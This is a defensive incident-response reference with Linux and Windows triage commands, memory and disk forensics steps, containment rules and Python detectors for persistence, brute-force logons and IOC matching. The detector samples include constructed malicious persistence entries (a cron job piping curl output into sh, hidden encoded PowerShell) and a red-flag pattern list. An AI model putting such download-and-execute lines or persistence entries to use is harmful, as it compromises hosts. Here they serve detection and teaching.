1. Preparation → Policies, tools, training
2. Detection → Identify potential incident
3. Analysis → Confirm, scope, triage
4. Containment → Stop the spread
5. Eradication → Remove the threat
6. Recovery → Restore normal operations
7. Post-Incident → Lessons learned, reporting
```bash
# Who is logged in?
who / w / last
# What processes are running?
ps aux --sort=-%cpu | head -20
# Active network connections
netstat -antp
ss -antp
# Recent file modifications
find / -mtime -1 -type f 2>/dev/null | head -50
find /tmp /var/tmp /dev/shm -type f 2>/dev/null
# Scheduled jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check bash history
cat ~/.bash_history
cat /home/*/.bash_history
```
```powershell
# Running processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20
# Network connections
Get-NetTCPConnection | Where-Object State -eq 'Established'
# Recent event logs (login failures)
# Filter on the event ID first; filtering after -MaxEvents only inspects the 50 newest events of any kind
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} -MaxEvents 50
# Recently modified files
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |
    Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)}
# Startup items
Get-CimInstance Win32_StartupCommand
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'}
```
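The scheduled-job and startup checks above dump raw text that still has to be read by eye. The following added Python example (not code from the original page) parses constructed `cat /etc/crontab` and `reg query ...\Run` output and flags entries that match common persistence red flags: jobs running from world-writable temp directories, download-and-pipe-to-shell one-liners, hidden or encoded PowerShell, and binaries in `C:\Users\Public` or `Temp`. The sample entries and the pattern list are constructed for illustration; extend the list with your own environment's known-bad locations.

```python
import re

# Constructed sample of `cat /etc/crontab` output (not from a real host)
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    /dev/shm/.cache/update.sh
@reboot         www-data curl -s http://198.51.100.7/a.sh | sh
"""

# Constructed sample of `reg query HKCU\...\Run` output (not from a real host)
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    powershell.exe -w hidden -enc QQBCAEMA
    Helper      REG_SZ    C:\Users\Public\svchost.exe
"""

# Red-flag patterns (constructed starting list) and the reason reported for each
SUSPICIOUS = [
    (re.compile(r"/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable temp directory"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden PowerShell window"),
    (re.compile(r"C:\\Users\\Public\\", re.I), "binary in C:\\Users\\Public"),
    (re.compile(r"\\(Temp|AppData\\Local\\Temp)\\", re.I), "binary in a Temp directory"),
]


def parse_crontab(text):
    """Return (user, command) for each job line of a system crontab.

    Environment assignments (SHELL=, PATH=, MAILTO=), comments and blank lines are skipped;
    both five-field schedules and @reboot/@daily style specials are handled.
    """
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)                       # @special user command
        else:
            parts = line.split(None, 6)                       # m h dom mon dow user command
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) == 3:
            jobs.append((parts[1], parts[2]))
    return jobs


def parse_run_key(text):
    """Return (value_name, command) for each REG_SZ / REG_EXPAND_SZ value in `reg query` output."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+)$", line)
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def review(entries):
    """Return a finding for every entry whose command matches at least one red-flag pattern."""
    findings = []
    for name, cmd in entries:
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            findings.append({"name": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review(parse_crontab(SAMPLE_CRONTAB)) + review(parse_run_key(SAMPLE_RUN_KEY)):
        print(f"{f['name']}: {f['command']}  <- {', '.join(f['reasons'])}")
```

Feed it real output by reading the files or command output instead of the constructed samples; the parsers deliberately ignore environment lines and the key header so that only executable entries reach the pattern check.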
```text
/var/log/auth.log        # Authentication (Debian/Ubuntu)
/var/log/secure          # Authentication (RHEL/CentOS)
/var/log/syslog          # General system
/var/log/messages        # General (RHEL)
/var/log/apache2/        # Apache web server
/var/log/nginx/          # Nginx web server
/var/log/cron            # Cron jobs
/var/log/lastlog         # Last logins
/home/*/.bash_history    # User history
```
Security → 4624/4625 (logon), 4720 (user created)
System → 7045 (new service), 7040 (service changed)
Application → Application errors
PowerShell → Microsoft-Windows-PowerShell/Operational
Sysmon → Detailed process, network, file events
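The Linux auth logs and the Windows 4624/4625 events above answer the same question from two sources: who was trying to log in, from where, and did they eventually succeed. The following added Python example (not from the original page) normalizes constructed `auth.log` sshd lines and constructed Windows logon events into one shape and flags any source address that accumulated a threshold of failures and then logged in successfully. The sample lines, the `(EventID, TargetUserName, IpAddress)` tuple layout for Windows events and the threshold of 3 are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed auth.log excerpt (Debian/Ubuntu sshd format); not from a real system
AUTH_LOG = """\
Mar  3 10:01:02 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 40122 ssh2
Mar  3 10:01:04 web01 sshd[2203]: Failed password for root from 203.0.113.5 port 40130 ssh2
Mar  3 10:01:06 web01 sshd[2205]: Failed password for root from 203.0.113.5 port 40141 ssh2
Mar  3 10:01:09 web01 sshd[2207]: Accepted password for root from 203.0.113.5 port 40150 ssh2
Mar  3 10:02:00 web01 sshd[2210]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Mar  3 10:03:00 web01 sshd[2212]: Accepted publickey for bob from 192.0.2.44 port 52000 ssh2
"""

# Constructed Windows Security events as (EventID, TargetUserName, IpAddress) tuples,
# i.e. the fields you would pull out of Get-WinEvent results
WIN_EVENTS = [
    (4625, "svc_backup", "203.0.113.77"),
    (4625, "svc_backup", "203.0.113.77"),
    (4625, "svc_backup", "203.0.113.77"),
    (4625, "svc_backup", "203.0.113.77"),
    (4624, "svc_backup", "203.0.113.77"),
    (4625, "alice", "10.0.0.15"),
    (4624, "alice", "10.0.0.15"),
    (4720, "newuser", "-"),            # user created; not a logon event, ignored here
]

SSH_RX = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\S+)"
)


def ssh_events(text):
    """Normalize sshd lines from auth.log into (outcome, user, source_ip) tuples."""
    out = []
    for line in text.splitlines():
        m = SSH_RX.search(line)
        if m:
            outcome = "fail" if m.group(1) == "Failed" else "success"
            out.append((outcome, m.group(2), m.group(3)))
    return out


def windows_events(events):
    """Normalize Windows logon events (4624 success, 4625 failure) into the same tuple shape."""
    out = []
    for event_id, user, ip in events:
        if event_id == 4625:
            out.append(("fail", user, ip))
        elif event_id == 4624:
            out.append(("success", user, ip))
    return out


def find_brute_force(events, threshold=3):
    """Flag source IPs that reached `threshold` failures and then logged in successfully.

    Events must be in chronological order; failures are counted per source address.
    """
    failures = defaultdict(int)
    alerts = []
    for outcome, user, ip in events:
        if outcome == "fail":
            failures[ip] += 1
        elif failures[ip] >= threshold:
            alerts.append({"source": ip, "user": user, "failures_before_success": failures[ip]})
    return alerts


if __name__ == "__main__":
    for alert in find_brute_force(ssh_events(AUTH_LOG)) + find_brute_force(windows_events(WIN_EVENTS)):
        print(alert)
```

A source that only fails (the 198.51.100.9 line) is noise at this threshold; a successful logon after repeated failures from the same address is the event worth paging on, and the same function handles both log sources once they are normalized.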
```bash
# Identify profile
volatility -f memory.dmp imageinfo
# Running processes
volatility -f memory.dmp --profile=Win7SP1x64 pslist
volatility -f memory.dmp --profile=Win7SP1x64 pstree
# Network connections
volatility -f memory.dmp --profile=Win7SP1x64 netscan
# Command history
volatility -f memory.dmp --profile=Win7SP1x64 cmdscan
volatility -f memory.dmp --profile=Win7SP1x64 consoles
# Dump process
volatility -f memory.dmp --profile=Win7SP1x64 procdump -p PID -D /output/
# Find injected code
volatility -f memory.dmp --profile=Win7SP1x64 malfind
```
```bash
# Create forensic image (Linux)
dd if=/dev/sda of=image.dd bs=4M status=progress
dcfldd if=/dev/sda of=image.dd hash=sha256 hashlog=hash.txt
# Mount read-only
mount -o ro,loop image.dd /mnt/evidence
# File carving
foremost -i image.dd -o /output/
photorec image.dd
# Hash verification
md5sum image.dd
sha256sum image.dd
```
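The hash you record at acquisition time is only useful if you re-verify it before and after every analysis step. The following added Python example (not from the original page) hashes an image in fixed-size chunks so a multi-terabyte file never has to fit in memory, writes the digest in `sha256sum`-compatible form, and re-verifies it, returning `False` on a filename or digest mismatch. The `demo()` function builds a small constructed "image" in a temporary directory and flips one byte to show the verification failing; file names and contents there are assumptions for illustration.

```python
import hashlib
import os
import tempfile


def hash_file(path, algorithm="sha256", chunk_size=4 * 1024 * 1024):
    """Hash a (possibly very large) file in chunks; returns the lowercase hex digest."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def write_hashlog(image_path, log_path, algorithm="sha256"):
    """Record the image digest as "<digest>  <filename>", the format sha256sum -c understands."""
    digest = hash_file(image_path, algorithm)
    with open(log_path, "w") as f:
        f.write(f"{digest}  {os.path.basename(image_path)}\n")
    return digest


def verify_hashlog(image_path, log_path, algorithm="sha256"):
    """Re-hash the image and compare with the recorded entry; False on any mismatch."""
    with open(log_path) as f:
        recorded, _, name = f.readline().rstrip("\n").partition("  ")
    if name != os.path.basename(image_path):
        return False
    return recorded.lower() == hash_file(image_path, algorithm)


def demo():
    """Constructed walk-through: write a fake image, record its hash, verify, tamper, verify again."""
    with tempfile.TemporaryDirectory() as d:
        image = os.path.join(d, "image.dd")
        log = os.path.join(d, "hash.txt")
        with open(image, "wb") as f:
            f.write(b"\x00" * 1024 + b"constructed evidence bytes" + b"\xff" * 1024)
        write_hashlog(image, log)
        intact = verify_hashlog(image, log)
        with open(image, "r+b") as f:       # simulate a single altered byte in the image
            f.seek(1024)
            f.write(b"C")
        tampered = verify_hashlog(image, log)
        return intact, tampered


if __name__ == "__main__":
    print(demo())   # (True, False)
```

Because the log line matches the `sha256sum` format, the same `hash.txt` can later be checked from the shell with `sha256sum -c hash.txt` by anyone in the chain of custody who does not have this script.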
```bash
# Isolate Linux host
# -I inserts at the top of the chain, so rules added later take precedence:
# the SIEM ACCEPT rules below end up above the DROP rules.
# Run this from a console session, or your own SSH session will be cut off too.
iptables -I INPUT -j DROP
iptables -I OUTPUT -j DROP
iptables -I INPUT -s SIEM_IP -j ACCEPT   # Keep SIEM connected (inbound)
iptables -I OUTPUT -d SIEM_IP -j ACCEPT  # Keep SIEM connected (outbound, so logs still ship)
# Block malicious IP
iptables -A INPUT -s 1.2.3.4 -j DROP
iptables -A OUTPUT -d 1.2.3.4 -j DROP
# Kill malicious process
kill -9 PID
# Disable compromised user
passwd -l username
usermod -L username
```
| Type | Examples |
|---|---|
| File hashes | MD5, SHA1, SHA256 |
| IP addresses | C2 servers, attacker IPs |
| Domain names | Malicious domains |
| URLs | Malware download URLs |
| Email addresses | Phishing senders |
| Registry keys | Persistence locations |
| Mutexes | Malware mutex names |
| User agents | Malicious HTTP agents |
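Indicator lists arrive defanged (`hxxp`, `[.]`) and in mixed case, while logs contain the live form, so matching needs normalization and type-aware boundaries (a subdomain of a known-bad domain should match; `203.0.113.45` should not match inside `203.0.113.450`). The following added Python example (not from the original page) refangs and normalizes an IOC set covering several of the types in the table, then scans constructed proxy, DNS, AV and mail log lines for them. All indicators, addresses and log lines are constructed for illustration; only the hashes of the empty string are real and are used purely as sample values.

```python
import re

# Constructed IOC feed in the shapes intel feeds typically deliver (defanged, mixed case)
IOCS = {
    "hash": [
        "D41D8CD98F00B204E9800998ECF8427E",                                   # md5 of ""
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",   # sha256 of ""
    ],
    "ip": ["203.0.113[.]45", "198.51.100.22"],
    "domain": ["Evil-Update[.]example", "cdn.example.net"],
    "url": ["hxxp://203.0.113[.]45/payload.bin"],
    "email": ["Billing@Evil-Update[.]Example"],
}

# Constructed log lines from several sources (proxy, DNS, AV, mail)
SAMPLE_LOGS = [
    "2024-03-03T10:00:01Z proxy src=10.0.0.21 dst=203.0.113.45 url=http://203.0.113.45/payload.bin status=200",
    "2024-03-03T10:00:05Z dns client=10.0.0.21 query=evil-update.example type=A",
    "2024-03-03T10:00:09Z av host=ws-21 file=C:\\Users\\alice\\Downloads\\inv.pdf "
    "sha256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855",
    "2024-03-03T10:01:00Z mail from=billing@evil-update.example to=alice@corp.example subject=Invoice",
    "2024-03-03T10:02:00Z dns client=10.0.0.30 query=www.example.org type=A",
]

# Boundaries per IOC type: domains may be preceded by "." so subdomains of a bad domain match;
# hashes must not be a substring of a longer hex run; everything else needs a non-word, non-dot edge
BOUNDARY = {
    "domain": (r"(?<![\w-])", r"(?![\w-])"),
    "hash": (r"(?<![0-9a-f])", r"(?![0-9a-f])"),
}
DEFAULT_BOUNDARY = (r"(?<![\w.])", r"(?![\w.])")


def refang(value):
    """Undo common defanging so feed values compare to what logs actually contain."""
    return (value.replace("[.]", ".").replace("(.)", ".")
                 .replace("hxxp", "http").replace("hXXp", "http"))


def normalize(value):
    """Refang, trim and lowercase; log lines are lowercased the same way before matching."""
    return refang(value.strip()).lower()


def compile_index(iocs):
    """Map each normalized IOC to (type, compiled pattern) with boundaries suited to its type."""
    index = {}
    for kind, values in iocs.items():
        left, right = BOUNDARY.get(kind, DEFAULT_BOUNDARY)
        for raw in values:
            value = normalize(raw)
            index[value] = (kind, re.compile(left + re.escape(value) + right))
    return index


def scan(lines, iocs):
    """Return one hit per (line, IOC) pair found in the given log lines."""
    index = compile_index(iocs)
    hits = []
    for n, line in enumerate(lines, 1):
        lowered = line.lower()
        for value, (kind, rx) in index.items():
            if rx.search(lowered):
                hits.append({"line": n, "type": kind, "ioc": value})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS, IOCS):
        print(hit)
```

A hit on the domain inside the sender address of the mail line is intentional: a domain IOC should fire wherever the domain appears, which is why the email and domain types carry different boundaries.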
| Level | Description | Response Time |
|---|---|---|
| Critical | Active breach, data exfil | Immediate |
| High | Confirmed malware, compromised admin | < 1 hour |
| Medium | Suspicious activity, policy violation | < 4 hours |
| Low | Single failed login, minor anomaly | < 24 hours |
| Informational | Normal but notable event | Next business day |